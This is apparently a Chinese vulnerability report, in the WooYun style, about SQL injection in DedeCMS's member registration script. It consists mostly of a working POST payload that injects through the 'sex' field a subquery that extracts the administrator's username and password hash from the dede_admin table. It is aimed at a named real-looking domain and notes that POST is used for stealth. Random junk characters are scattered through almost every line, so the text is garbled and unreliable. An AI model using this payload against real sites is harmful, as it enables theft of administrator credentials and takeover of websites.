漏洞类型: SQL注射漏洞: q: j. N2 V, }
简要描述:' T* y D8 w" V- y( Z$ P+ ]
' j0 y: ? D) K
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.1 i* |5 y1 m; F% O3 r# ]
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
, K6 Z( l, h0 _. r详细说明:跟这个漏洞
- X" B, A/ {* T8 b
( ~* C, a$ W0 G$ [- QWooYun: Dedecms SQL注射导致审核机制绕过漏洞
5 V: m/ ]' Y' u; R4 s. q是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
' S2 @" T1 z0 h0 \2 E! `( z$ UPOST提交以下数据,其实不用POST提交的,这样隐蔽点.! Q. n! P" }8 v3 U- h+ ~
W8 i2 R$ D. T( Z a" N) \& k: jwww.political-security.com/member/reg_new.php8 l! @( T- C5 W/ Y4 c/ y6 C* x
6 j# x7 C5 I& l# d; WPOST& n6 H9 t9 E( k
+ U1 n4 C3 a$ S t2 H! [' `' [
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&; a3 ]% ]# L) B5 o( B
userid=c4rp3nt3r&uname=c4rp3nt3r+ F: i& i& ?" C5 M; [8 \
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss5 p$ t# Z6 _, \5 P3 @ O B! g
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,8 H. p7 U7 d' F4 |( }
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');8 | `- d* k$ m! [0 k
%00&vdcode=glos&agree= |